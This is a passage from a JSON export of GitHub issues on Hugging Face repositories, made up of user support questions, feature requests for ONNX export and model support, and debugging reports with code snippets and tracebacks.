"https://github.com/huggingface/chat-ui/issues/1074", "state": "closed", "labels": [ "support" ], "created_at": "2024-04-25T15:34:07Z", "updated_at": "2024-04-27T14:58:45Z", "comments": 1, "user": "abdalladorrah" }, { "repo": "huggingface/chat-ui", "number": 1073, "title": "Support for Llama-3-8B-Instruct model", "body": "Hi,\r\nThe model meta-llama/Meta-Llama-3-8B-Instruct is unlisted; do you know when it will be supported?\r\n\r\nhttps://github.com/huggingface/chat-ui/blob/3d83131e5d03e8942f9978bf595a7caca5e2b3cd/.env.template#L229\r\n\r\nthanks.", "url": "https://github.com/huggingface/chat-ui/issues/1073", "state": "open", "labels": [ "question", "models", "huggingchat" ], "created_at": "2024-04-25T14:03:35Z", "updated_at": "2024-04-30T05:47:05Z", "user": "cszhz" }, { "repo": "huggingface/chat-ui", "number": 1072, "title": "[v0.8.3] serper, serpstack API, local web search not working", "body": "## Context\r\n\r\nI have a serper.dev API key and a serpstack API key, and I have put them correctly in my `.env.local` file.\r\n\r\n\"image\"\r\n\r\n## Issue\r\n\r\nHowever, even if I enable Web Search, it still does not reach out to those APIs, and shows me \"an error occurred\" on the Web Search part.\r\n\r\n\"image\"\r\n\r\nI don't see calls reaching Serper and SerpStack either.\r\n\r\n\"image\"\r\n\r\n\"image\"\r\n\r\nIt was working for a bit on `v0.8.2`, but then it stopped working there as well. Now, for `v0.8.3`, it's not working at all. Am I missing something? I have tried using either of those APIs alone too, but it still does not work.\r\n\r\nPlease help.", "url": "https://github.com/huggingface/chat-ui/issues/1072", "state": "closed", "labels": [ "support" ], "created_at": "2024-04-25T13:24:40Z", "updated_at": "2024-05-09T16:28:15Z", "comments": 14, "user": "adhishthite" }, { "repo": "huggingface/diffusers", "number": 7775, "title": "How to input gradio settings in Python", "body": "Hi.\r\n\r\nI use **realisticStockPhoto_v20** on Fooocus with the **sdxl_film_photography_style** lora and I really like the results.\r\nFooocus and other gradio implementations come with settings inputs that I want to utilize in Python as well. 
In particular, if this is my code:\r\n```\r\ndevice = \"cuda\"\r\nmodel_path = \"weights/realisticStockPhoto_v20.safetensors\"\r\n\r\npipe = StableDiffusionXLInpaintPipeline.from_single_file(\r\n model_path, \r\n torch_dtype=torch.float16, \r\n num_in_channels=4).to(device)\r\n\r\npipe.load_lora_weights(\".\", weight_name=\"weights/SDXL_FILM_PHOTOGRAPHY_STYLE_BetaV0.4.safetensors\", adapter_name=\"film\")\r\n```\r\nhow can I set the following settings/parameters in code?\r\n\r\n- Negative Prompt\r\n- Preset (initial, lcm, default, lighting, realistic, sai, anime)\r\n- Performance (quality, speed, extreme speed, lightning)\r\n- width-height\r\n- image number\r\n- output format\r\n- Style (Fooocus v2, fooocus photography, fooocus negative, foocus enhance, etc.)\r\n- Base Model\r\n- Refiner\r\n- Lora 1,2,3,4,5,...\r\n- Guidance scale\r\n- Image sharpness", "url": "https://github.com/huggingface/diffusers/issues/7775", "state": "closed", "labels": [], "created_at": "2024-04-25T08:43:20Z", "updated_at": "2024-11-20T00:07:26Z", "user": "levoz92" }, { "repo": "huggingface/chat-ui", "number": 1069, "title": "CohereForAI ChatTemplate", "body": "Now that there is official support for tgi in CohereForAI/c4ai-command-r-v01. How to use the chat template found in the tokenizer config for the ui. Or alternatively, is it possible to add in PROMPTS.md the correct template for cohere?", "url": "https://github.com/huggingface/chat-ui/issues/1069", "state": "open", "labels": [], "created_at": "2024-04-25T05:45:35Z", "updated_at": "2024-04-25T05:45:35Z", "comments": 0, "user": "yanivshimoni89" }, { "repo": "huggingface/transformers.js", "number": 727, "title": "Preferred citation of Transformers.js", "body": "### Question\n\nLove the package, and am using it in research - I am wondering, does there exist a preferred citation format for the package to cite it in papers?", "url": "https://github.com/huggingface/transformers.js/issues/727", "state": "open", "labels": [ "question" ], "created_at": "2024-04-24T23:07:20Z", "updated_at": "2024-04-24T23:21:13Z", "user": "ludgerpaehler" }, { "repo": "huggingface/diarizers", "number": 4, "title": "How to save the finetuned model as a .bin file?", "body": "Hi,\r\n\r\nI finetuned the pyannote-segmentation model for my usecase but it is saved as a model.safetensors file. Can I convert it to a pytorch_model.bin file? I am using whisperx to create speaker-aware transcripts and .safetensors isn't working with that library. Thanks!", "url": "https://github.com/huggingface/diarizers/issues/4", "state": "closed", "labels": [], "created_at": "2024-04-24T20:50:19Z", "updated_at": "2024-04-30T21:02:32Z", "user": "anuragrawal2024" }, { "repo": "huggingface/transformers.js", "number": 725, "title": "How to choose a language's dialect when using `automatic-speech-recognition` pipeline?", "body": "### Question\r\n\r\nHi, so I was originally using the transformers library (python version) in my backend, but when refactoring my application for scale. It made more sense to move my implementation of whisper from the backend to the frontend (for my specific usecase). So I was thrilled when I saw that transformers.js supported whisper via the `automatic-speech-recognition` pipeline. 
However, I'm a little confused by the implementation, and the documentation left me with the question in the title.\r\n\r\nHow to choose a language's dialect when using the `automatic-speech-recognition` pipeline?\r\n\r\nIn the Python implementation of whisper, you don't have to specify the language being spoken as long as you're using the correct model size for multilingual support. But from your examples on transformers.js, it seems like you do in the JS implementation.\r\n\r\n```\r\nconst transcriber = await pipeline('automatic-speech-recognition', 'Xenova/whisper-small');\r\nconst url = 'https://huggingface.co/datasets/Xenova/transformers.js-docs/resolve/main/french-audio.mp3';\r\nconst output = await transcriber(url, { language: 'french', task: 'transcribe' });\r\n// { text: \" J'adore, j'aime, je n'aime pas, je d\u00e9teste.\" }\r\n```\r\n\r\nHowever, there's no list of supported languages beyond what you can find on the whisper github repo. That's usually not a problem. But how do you deal with a language like Chinese, which has two main dialects, Mandarin and Cantonese? In Python, I didn't have to worry about it, but in JS, it seems to be a potential issue.\r\n\r\nPlease help. Any guidance will be appreciated.", "url": "https://github.com/huggingface/transformers.js/issues/725", "state": "closed", "labels": [ "question" ], "created_at": "2024-04-24T09:44:38Z", "updated_at": "2025-11-06T20:36:01Z", "user": "jquintanilla4" }, { "repo": "huggingface/text-embeddings-inference", "number": 248, "title": "how to support gpu version 10.1 rather than 12.2", "body": "### Feature request\n\nHow can a GPU with CUDA 10.1 be supported, rather than CUDA 12.2?\n\n### Motivation\n\nHow can a GPU with CUDA 10.1 be supported, rather than CUDA 12.2?\n\n### Your contribution\n\nHow can a GPU with CUDA 10.1 be supported, rather than CUDA 12.2?", "url": "https://github.com/huggingface/text-embeddings-inference/issues/248", "state": "closed", "labels": [], "created_at": "2024-04-24T08:49:45Z", "updated_at": "2024-04-26T13:02:44Z", "user": "fanqiangwei" }, { "repo": "huggingface/diffusers", "number": 7766, "title": "IP-Adapter FaceID Plus How to use questions", "body": "https://github.com/huggingface/diffusers/blob/9ef43f38d43217f690e222a4ce0239c6a24af981/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion.py#L492\r\n\r\n## error msg:\r\n pipe.unet.encoder_hid_proj.image_projection_layers[0].clip_embeds = clip_embeds.to(dtype=torch.float16)\r\n AttributeError: 'list' object has no attribute 'to'\r\n\r\nHi!\r\nI'm having some problems using IP-Adapter FaceID Plus. Can you help me answer these questions? Thank you very much.\r\n\r\n1. first question: What should I pass in the `ip_adapter_image` parameter in the `prepare_ip_adapter_image_embeds` function?\r\n2. 
second question: What problem does this cause when the following code does not match in the merge code link below and in the example in the ip_adapter.md file \r\nthis is merge link: \r\n https://github.com/huggingface/diffusers/pull/7186#issuecomment-1986961595\r\nDifferential code:\r\n ```\r\n ref_images_embeds = torch.stack(ref_images_embeds, dim=0).unsqueeze(0)\r\n neg_ref_images_embeds = torch.zeros_like(ref_images_embeds)\r\n id_embeds = torch.cat([neg_ref_images_embeds, ref_images_embeds]).to(dtype=torch.float16, device=\"cuda\"))\r\n ```\r\n@yiyixuxu @fabiorigano \r\n\r\n## os:\r\ndiffusers==diffusers-0.28.0.dev0\r\n\r\n## this is my code:\r\n\r\n```\r\n# @FileName\uff1aStableDiffusionIpAdapterFaceIDTest.py\r\n# @Description\uff1a\r\n# @Author\uff1adyh\r\n# @Time\uff1a2024/4/24 11:45\r\n# @Website\uff1awww.xxx.com\r\n# @Version\uff1aV1.0\r\nimport cv2\r\nimport numpy as np\r\nimport torch\r\nfrom PIL import Image\r\nfrom diffusers import StableDiffusionPipeline\r\nfrom insightface.app import FaceAnalysis\r\nfrom transformers import CLIPVisionModelWithProjection\r\n\r\nmodel_path = '../../../aidazuo/models/Stable-diffusion/stable-diffusion-v1-5'\r\nclip_path = '../../../aidazuo/models/CLIP-ViT-H-14-laion2B-s32B-b79K'\r\nip_adapter_path = '../../../aidazuo/models/IP-Adapter-FaceID'\r\nip_img_path = '../../../aidazuo/jupyter-script/test-img/vermeer.png'\r\n\r\n\r\ndef extract_face_features(image_lst: list, input_size: tuple):\r\n # Extract Face features using insightface\r\n ref_images = []\r\n app = FaceAnalysis(name=\"buffalo_l\",\r\n root=ip_adapter_path,\r\n providers=['CUDAExecutionProvider', 'CPUExecutionProvider'])\r\n\r\n app.prepare(ctx_id=0, det_size=input_size)\r\n for img in image_lst:\r\n image = cv2.cvtColor(np.asarray(img), cv2.COLOR_BGR2RGB)\r\n faces = app.get(image)\r\n image = torch.from_numpy(faces[0].normed_embedding)\r\n ref_images.append(image.unsqueeze(0))\r\n ref_images = torch.cat(ref_images, dim=0)\r\n\r\n return ref_images\r\n\r\n\r\nip_adapter_img = Image.open(ip_img_path)\r\n\r\nimage_encoder = CLIPVisionModelWithProjection.from_pretrained(\r\n clip_path,\r\n torch_dtype=torch.float16,\r\n use_safetensors=True\r\n)\r\n\r\npipe = StableDiffusionPipeline.from_pretrained(\r\n model_path,\r\n variant=\"fp16\",\r\n safety_checker=None,\r\n image_encoder=image_encoder,\r\n torch_dtype=torch.float16).to(\"cuda\")\r\n\r\nadapter_file_lst = [\"ip-adapter-faceid-plus_sd15.bin\"]\r\nadapter_weight_lst = [0.5]\r\n\r\npipe.load_ip_adapter(ip_adapter_path, subfolder=None, weight_name=adapter_file_lst)\r\npipe.set_ip_adapter_scale(adapter_weight_lst)\r\n\r\nface_id_embeds = extract_face_features([ip_adapter_img], ip_adapter_img.size)\r\n\r\nclip_embeds = pipe.prepare_ip_adapter_image_embeds(ip_adapter_image=[ip_adapter_img],\r\n ip_adapter_image_embeds=None,\r\n device='cuda',\r\n num_images_per_prompt=1,\r\n do_classifier_free_guidance=True)\r\n\r\npipe.unet.encoder_hid_proj.image_projection_layers[0].clip_embeds = clip_embeds.to(dtype=torch.float16)\r\npipe.unet.encoder_hid_proj.image_projection_layers[0].shortcut = False # True if Plus v2\r\n\r\ngenerator = torch.manual_seed(33)\r\nimages = pipe(\r\n prompt='a beautiful girl',\r\n ip_adapter_image_embeds=clip_embeds,\r\n negative_prompt=\"\",\r\n num_inference_steps=30,\r\n num_images_per_prompt=1,\r\n generator=generator,\r\n width=512,\r\n height=512).images\r\n\r\nprint(images)\r\n```\r\n\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/7766", "state": "closed", "labels": [], "created_at": 
"2024-04-24T07:56:38Z", "updated_at": "2024-11-20T00:02:30Z", "user": "Honey-666" }, { "repo": "huggingface/peft", "number": 1673, "title": "How to set Lora_dropout=0 when loading trained peft model for inference?", "body": "### System Info\n\npeft==0.10.0\r\ntransformers==4.39.3\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n\r\n```python\r\nclass Linear(nn.Module, LoraLayer): \r\n\r\n def forward(self, x: torch.Tensor, *args: Any, **kwargs: Any) -> torch.Tensor:\r\n self._check_forward_args(x, *args, **kwargs)\r\n adapter_names = kwargs.pop(\"adapter_names\", None)\r\n\r\n if self.disable_adapters:\r\n if self.merged:\r\n self.unmerge()\r\n result = self.base_layer(x, *args, **kwargs)\r\n elif adapter_names is not None:\r\n result = self._mixed_batch_forward(x, *args, adapter_names=adapter_names, **kwargs)\r\n elif self.merged:\r\n result = self.base_layer(x, *args, **kwargs)\r\n else:\r\n result = self.base_layer(x, *args, **kwargs)\r\n torch_result_dtype = result.dtype\r\n for active_adapter in self.active_adapters:\r\n if active_adapter not in self.lora_A.keys():\r\n continue\r\n lora_A = self.lora_A[active_adapter]\r\n lora_B = self.lora_B[active_adapter]\r\n dropout = self.lora_dropout[active_adapter]\r\n scaling = self.scaling[active_adapter]\r\n x = x.to(lora_A.weight.dtype)\r\n\r\n if not self.use_dora[active_adapter]:\r\n result = result + lora_B(lora_A(dropout(x))) * scaling\r\n else:\r\n x = dropout(x)\r\n result = result + self._apply_dora(x, lora_A, lora_B, scaling, active_adapter)\r\n\r\n result = result.to(torch_result_dtype)\r\n\r\n return result\r\n```\n\n### Expected behavior\n\nWe can see that `lora_dropout` in forward function is working the same way whether under train or inference mode.", "url": "https://github.com/huggingface/peft/issues/1673", "state": "closed", "labels": [], "created_at": "2024-04-24T07:47:19Z", "updated_at": "2024-05-10T02:22:17Z", "user": "flyliu2017" }, { "repo": "huggingface/optimum", "number": 1826, "title": "Phi3 support", "body": "### Feature request\n\nMicrosoft's new phi3 mode, in particular the 128K context mini model, is not supported by Optimum export. \r\n\r\nError is:\r\n\"ValueError: Trying to export a phi3 model, that is a custom or unsupported architecture, but no custom export configuration was passed as `custom_export_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type phi3 to be supported natively in the ONNX export.\"\n\n### Motivation\n\nPhi3-mini is potentially very significant as it has a large context but a small size. This could be used in lots of scenarios if it has good performance.\n\n### Your contribution\n\nUnlikely I could do a PR as ONNX work is not my forte.", "url": "https://github.com/huggingface/optimum/issues/1826", "state": "closed", "labels": [], "created_at": "2024-04-23T15:54:21Z", "updated_at": "2024-05-24T13:53:08Z", "comments": 4, "user": "martinlyons" }, { "repo": "huggingface/datasets", "number": 6830, "title": "Add a doc page for the convert_to_parquet CLI", "body": "Follow-up to https://github.com/huggingface/datasets/pull/6795. 
Useful for https://github.com/huggingface/dataset-viewer/issues/2742. cc @albertvillanova ", "url": "https://github.com/huggingface/datasets/issues/6830", "state": "closed", "labels": [ "documentation" ], "created_at": "2024-04-23T09:49:04Z", "updated_at": "2024-04-25T10:44:11Z", "comments": 0, "user": "severo" }, { "repo": "huggingface/transformers.js", "number": 723, "title": "404 when trying Qwen in V3", "body": "### Question\n\nThis is probably just because V3 is a work in progress, but I wanted to make sure.\r\n\r\nWhen trying to run Qwen 1.5 - 0.5B, it works with the V2 script, but when swapping to V3 I get a 404 Not Found.\r\n\r\n```\r\ntype not specified for model. Using the default dtype: q8.\r\nGET https://huggingface.co/Xenova/Qwen1.5-0.5B-Chat/resolve/main/onnx/model_quantized.onnx 404 (Not Found)\r\n```\r\n\r\nIt seems V3 is looking for a file that was renamed 3 months ago.\r\n[Rename onnx/model_quantized.onnx to onnx/decoder_model_merged_quantized.onnx](https://huggingface.co/Xenova/Qwen1.5-0.5B-Chat/commit/09e055ac27002bb954137751b31376de79ae17a5)\r\n\r\nI've tried setting `dtype` to 16 and 32, which does change the URL it tries to get, but those URLs also do not exist :-D\r\n\r\ne.g. `https://huggingface.co/Xenova/Qwen1.5-0.5B-Chat/resolve/main/onnx/model_fp16.onnx` when using `dtype: 'fp16'`.\r\n\r\nIs there something I can do to make V3 find the correct files?\r\n\r\n(I'm still trying to find that elusive small model with a large context size to do document summarization with)", "url": "https://github.com/huggingface/transformers.js/issues/723", "state": "open", "labels": [ "question" ], "created_at": "2024-04-22T19:14:17Z", "updated_at": "2024-05-28T08:26:09Z", "user": "flatsiedatsie" }, { "repo": "huggingface/diffusers", "number": 7740, "title": "How to get config of single_file", "body": "Hi,\r\nIs there any way to get the equivalent of model_index.json from a single_file?", "url": "https://github.com/huggingface/diffusers/issues/7740", "state": "closed", "labels": [], "created_at": "2024-04-22T14:00:21Z", "updated_at": "2024-04-22T23:26:50Z", "user": "suzukimain" }, { "repo": "huggingface/diffusers", "number": 7724, "title": "RuntimeError: Error(s) in loading state_dict for AutoencoderKL: Missing Keys! How to solve? ", "body": "### Describe the bug\n\nI am trying to get a Lora to run locally on my computer by using this code: https://github.com/hollowstrawberry/kohya-colab and changing it to a local format. When I get to the loading of the models, it gives an error. It seems that the AutoEncoder model has changed, but I do not know how to adjust this or solve this issue in any of the files. I am a very amateur coder; could someone still help me out? 
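\n\nFrom comparing the missing and unexpected keys in the log below, it looks like the checkpoint uses the old diffusers attention naming (`query`/`key`/`value`/`proj_attn`) while the current `AutoencoderKL` expects `to_q`/`to_k`/`to_v`/`to_out.0`. A rename along these lines might work (my own sketch, possibly incomplete):\n\n```python\nRENAMES = {\"query\": \"to_q\", \"key\": \"to_k\", \"value\": \"to_v\", \"proj_attn\": \"to_out.0\"}\n\ndef rename_vae_attn_keys(state_dict):\n    new_sd = {}\n    for k, v in state_dict.items():\n        # only rename the mid-block attention parameters flagged in the error\n        for old, new in RENAMES.items():\n            k = k.replace(f\"attentions.0.{old}.\", f\"attentions.0.{new}.\")\n        new_sd[k] = v\n    return new_sd\n```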
\n\n### Reproduction\n\nHere is the code: https://github.com/hollowstrawberry/kohya-colab\r\n\n\n### Logs\n\n```shell\nTraceback (most recent call last):\r\n File \"/Users/veravanderburg/Loras/kohya-trainer/train_network_wrapper.py\", line 9, in \r\n train(args)\r\n File \"/Users/veravanderburg/Loras/kohya-trainer/train_network.py\", line 168, in train\r\n text_encoder, vae, unet, _ = train_util.load_target_model(args, weight_dtype, accelerator)\r\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n File \"/Users/veravanderburg/Loras/kohya-trainer/library/train_util.py\", line 3149, in load_target_model\r\n text_encoder, vae, unet, load_stable_diffusion_format = _load_target_model(\r\n ^^^^^^^^^^^^^^^^^^^\r\n File \"/Users/veravanderburg/Loras/kohya-trainer/library/train_util.py\", line 3115, in _load_target_model\r\n text_encoder, vae, unet = model_util.load_models_from_stable_diffusion_checkpoint(args.v2, name_or_path, device)\r\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n File \"/Users/veravanderburg/Loras/kohya-trainer/library/model_util.py\", line 873, in load_models_from_stable_diffusion_checkpoint\r\n info = vae.load_state_dict(converted_vae_checkpoint)\r\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n File \"/Library/Frameworks/Python.framework/Versions/3.12/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 2153, in load_state_dict\r\n raise RuntimeError('Error(s) in loading state_dict for {}:\\n\\t{}'.format(\r\n\r\nRuntimeError: Error(s) in loading state_dict for AutoencoderKL:\r\n\tMissing key(s) in state_dict: \"encoder.mid_block.attentions.0.to_q.weight\", \"encoder.mid_block.attentions.0.to_q.bias\", \"encoder.mid_block.attentions.0.to_k.weight\", \"encoder.mid_block.attentions.0.to_k.bias\", \"encoder.mid_block.attentions.0.to_v.weight\", \"encoder.mid_block.attentions.0.to_v.bias\", \"encoder.mid_block.attentions.0.to_out.0.weight\", \"encoder.mid_block.attentions.0.to_out.0.bias\", \"decoder.mid_block.attentions.0.to_q.weight\", \"decoder.mid_block.attentions.0.to_q.bias\", \"decoder.mid_block.attentions.0.to_k.weight\", \"decoder.mid_block.attentions.0.to_k.bias\", \"decoder.mid_block.attentions.0.to_v.weight\", \"decoder.mid_block.attentions.0.to_v.bias\", \"decoder.mid_block.attentions.0.to_out.0.weight\", \"decoder.mid_block.attentions.0.to_out.0.bias\". 
\r\n\tUnexpected key(s) in state_dict: \"encoder.mid_block.attentions.0.key.bias\", \"encoder.mid_block.attentions.0.key.weight\", \"encoder.mid_block.attentions.0.proj_attn.bias\", \"encoder.mid_block.attentions.0.proj_attn.weight\", \"encoder.mid_block.attentions.0.query.bias\", \"encoder.mid_block.attentions.0.query.weight\", \"encoder.mid_block.attentions.0.value.bias\", \"encoder.mid_block.attentions.0.value.weight\", \"decoder.mid_block.attentions.0.key.bias\", \"decoder.mid_block.attentions.0.key.weight\", \"decoder.mid_block.attentions.0.proj_attn.bias\", \"decoder.mid_block.attentions.0.proj_attn.weight\", \"decoder.mid_block.attentions.0.query.bias\", \"decoder.mid_block.attentions.0.query.weight\", \"decoder.mid_block.attentions.0.value.bias\", \"decoder.mid_block.attentions.0.value.weight\".\n```\n\n\n### System Info\n\nthat command does not work for me\n\n### Who can help?\n\n@saya", "url": "https://github.com/huggingface/diffusers/issues/7724", "state": "closed", "labels": [ "bug" ], "created_at": "2024-04-19T13:27:17Z", "updated_at": "2024-04-22T08:45:24Z", "user": "veraburg" }, { "repo": "huggingface/optimum", "number": 1821, "title": "Idefics2 Support in Optimum for ONNX export", "body": "### Feature request\n\nWith reference to the new Idefics2 model- https://huggingface.co/HuggingFaceM4/idefics2-8b \r\nI would like to export it to ONNX which is currently not possible.\r\nPlease enable conversion support. Current Error with pip install transformers via GIT\r\n\r\n```\r\nTraceback (most recent call last):\r\n File \"/usr/local/bin/optimum-cli\", line 8, in \r\n sys.exit(main())\r\n File \"/usr/local/lib/python3.10/dist-packages/optimum/commands/optimum_cli.py\", line 163, in main\r\n service.run()\r\n File \"/usr/local/lib/python3.10/dist-packages/optimum/commands/export/onnx.py\", line 265, in run\r\n main_export(\r\n File \"/usr/local/lib/python3.10/dist-packages/optimum/exporters/onnx/__main__.py\", line 352, in main_export\r\n onnx_export_from_model(\r\n File \"/usr/local/lib/python3.10/dist-packages/optimum/exporters/onnx/convert.py\", line 1048, in onnx_export_from_model\r\n raise ValueError(\r\nValueError: Trying to export a idefics2 model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type idefics2 to be supported natively in the ONNX export.\r\n```\r\n\n\n### Motivation\n\nThe model is good and would like to export it to onnx asap\n\n### Your contribution\n\n-", "url": "https://github.com/huggingface/optimum/issues/1821", "state": "open", "labels": [ "feature-request", "onnx" ], "created_at": "2024-04-19T07:12:41Z", "updated_at": "2025-02-18T19:25:11Z", "comments": 8, "user": "gtx-cyber" }, { "repo": "huggingface/alignment-handbook", "number": 158, "title": "How to work with local data", "body": "I downloaded a dataset from hf. I want to load it locally, but it still tries to download it from hf and place it into the cache. \r\nHow can I use the local one I already downloaded? \r\n\r\nThank you. 
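\r\n\r\nEdit: for context, what I would expect to work (a sketch; the paths are placeholders):\r\n\r\n```python\r\nfrom datasets import load_dataset\r\n\r\n# Option 1: point directly at the local data files\r\nds = load_dataset(\"parquet\", data_files=\"path/to/local/data/*.parquet\")\r\n\r\n# Option 2: reuse the already-populated cache and never hit the Hub,\r\n# by setting HF_DATASETS_OFFLINE=1 in the environment before launching\r\n```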
", "url": "https://github.com/huggingface/alignment-handbook/issues/158", "state": "open", "labels": [], "created_at": "2024-04-18T10:26:14Z", "updated_at": "2024-05-14T11:20:55Z", "user": "pretidav" }, { "repo": "huggingface/optimum-quanto", "number": 182, "title": "Can I use quanto on AMD GPU?", "body": "Does quanto work with AMD GPUs ?", "url": "https://github.com/huggingface/optimum-quanto/issues/182", "state": "closed", "labels": [ "question", "Stale" ], "created_at": "2024-04-18T03:06:54Z", "updated_at": "2024-05-25T01:49:56Z", "user": "catsled" }, { "repo": "huggingface/accelerate", "number": 2680, "title": "How to get pytorch_model.bin from ckeckpoint files without zero_to_fp32.py", "body": "", "url": "https://github.com/huggingface/accelerate/issues/2680", "state": "closed", "labels": [], "created_at": "2024-04-17T11:30:32Z", "updated_at": "2024-04-18T22:40:14Z", "user": "lipiji" }, { "repo": "huggingface/datasets", "number": 6819, "title": "Give more details in `DataFilesNotFoundError` when getting the config names", "body": "### Feature request\n\nAfter https://huggingface.co/datasets/cis-lmu/Glot500/commit/39060e01272ff228cc0ce1d31ae53789cacae8c3, the dataset viewer gives the following error:\r\n\r\n```\r\n{\r\n \"error\": \"Cannot get the config names for the dataset.\",\r\n \"cause_exception\": \"DataFilesNotFoundError\",\r\n \"cause_message\": \"No (supported) data files found in cis-lmu/Glot500\",\r\n \"cause_traceback\": [\r\n \"Traceback (most recent call last):\\n\",\r\n \" File \\\"/src/services/worker/src/worker/job_runners/dataset/config_names.py\\\", line 73, in compute_config_names_response\\n config_names = get_dataset_config_names(\\n\",\r\n \" File \\\"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/inspect.py\\\", line 347, in get_dataset_config_names\\n dataset_module = dataset_module_factory(\\n\",\r\n \" File \\\"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\\\", line 1873, in dataset_module_factory\\n raise e1 from None\\n\",\r\n \" File \\\"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\\\", line 1854, in dataset_module_factory\\n return HubDatasetModuleFactoryWithoutScript(\\n\",\r\n \" File \\\"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\\\", line 1245, in get_module\\n module_name, default_builder_kwargs = infer_module_for_data_files(\\n\",\r\n \" File \\\"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\\\", line 595, in infer_module_for_data_files\\n raise DataFilesNotFoundError(\\\"No (supported) data files found\\\" + (f\\\" in {path}\\\" if path else \\\"\\\"))\\n\",\r\n \"datasets.exceptions.DataFilesNotFoundError: No (supported) data files found in cis-lmu/Glot500\\n\"\r\n ]\r\n}\r\n```\r\n\r\nbecause the deleted files were still listed in the README, see https://huggingface.co/datasets/cis-lmu/Glot500/discussions/4\r\n\r\nIdeally, the error message would include the name of the first configuration with missing files, to help the user understand how to fix it. Here, it would tell that configuration `aze_Ethi` has no supported data files, instead of telling that the `cis-lmu/Glot500` *dataset* has no supported data files (which is not true).\n\n### Motivation\n\nGiving more detail in the error would help the Datasets Hub users to debug why the dataset viewer does not work.\n\n### Your contribution\n\nNot sure how to best fix this, as there are a lot of loops on the dataset configs in the traceback methods. 
\"maybe\" it would be easier to handle if the code was completely isolating each config.", "url": "https://github.com/huggingface/datasets/issues/6819", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-04-17T11:19:47Z", "updated_at": "2024-04-17T11:19:47Z", "comments": 0, "user": "severo" }, { "repo": "huggingface/optimum", "number": 1818, "title": "Request for ONNX Export Support for Blip Model in Optimum", "body": "Hi Team, \r\n\r\nI hope this message finds you well. \r\n\r\n I've encountered an issue while attempting to export Blip model into the ONNX format using Optimum. I have used below command.\r\n\r\n`! optimum-cli export onnx -m Salesforce/blip-itm-base-coco --task feature-extraction blip_onnx`\r\n\r\n It appears that Optimum currently lacks support for this functionality, leading to errors during the export process.\r\n\r\n `ValueError: Trying to export a blip model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type blip to be supported natively in the ONNX export`\r\n \r\nCould you kindly provide insights into when we might expect support for exporting Blip models to ONNX to be implemented in Optimum?\r\n\r\nThank you for considering this request. I look forward to any updates or information you can provide on this matter.\r\n ", "url": "https://github.com/huggingface/optimum/issues/1818", "state": "open", "labels": [ "feature-request", "question", "onnx" ], "created_at": "2024-04-17T08:55:45Z", "updated_at": "2024-10-14T12:26:36Z", "user": "n9s8a" }, { "repo": "huggingface/transformers.js", "number": 715, "title": "How to unload/destroy a pipeline?", "body": "### Question\n\nI tried to find how to unload a pipeline to free up memory in the documentation, but couldn't find a mention of how to do that properly.\r\n\r\nIf there a proper way to \"unload\" a pipeline?\r\n\r\nI'd be happy to add the answer to the documentation.", "url": "https://github.com/huggingface/transformers.js/issues/715", "state": "closed", "labels": [ "question" ], "created_at": "2024-04-16T09:02:05Z", "updated_at": "2024-05-29T09:32:23Z", "user": "flatsiedatsie" }, { "repo": "huggingface/transformers.js", "number": 714, "title": "Reproducing model conversions", "body": "### Question\r\n\r\nI'm trying to reproduce the conversion of `phi-1_5_dev` to better understand the process. 
I'm running into a few bugs / issues along the way that I thought it'd be helpful to document.\r\n\r\nThe model [`@Xenova/phi-1_5_dev`](https://huggingface.co/Xenova/phi-1_5_dev) states:\r\n\r\n> https://huggingface.co/susnato/phi-1_5_dev with ONNX weights to be compatible with Transformers.js.\r\n\r\nI'm doing the following:\r\n\r\n```\r\ngit clone https://github.com/xenova/transformers.js.git && cd transformers.js/scripts\r\ngit clone https://huggingface.co/susnato/phi-1_5_dev\r\npython3 -m venv .venv && source .venv/bin/activate && pip install -r requirements.txt\r\npython3 convert.py --quantize --model_id phi-1_5_dev --task \"text-generation\"\r\n```\r\n\r\nHere, I hit my first issue - it looks like `transformers` on `pypi` does not support Phi:\r\n\r\n```\r\n raise KeyError(key)\r\nKeyError: 'phi'\r\n```\r\n\r\nSo I install from Github:\r\n\r\n```\r\npip install git+https://github.com/huggingface/transformers.git\r\n```\r\n\r\nThat produces:\r\n\r\n```\r\nRuntimeError: Failed to import optimum.exporters.onnx.__main__ because of the following error (look up to see its traceback):\r\ncannot import name 'is_torch_less_than_1_11' from 'transformers.pytorch_utils' (/Users/thekevinscott/code/codegen/research/model-conversion/throwaway/transformers.js/scripts/.venv/lib/python3.10/site-packages/transformers/pytorch_utils.py)\r\n```\r\n\r\nI believe `optimum` is also out of date:\r\n\r\n```\r\npip install git+https://github.com/huggingface/optimum.git\r\n```\r\n\r\nWith those two dependencies updated, this command now works:\r\n\r\n```\r\npython3 convert.py --quantize --model_id phi-1_5_dev --task 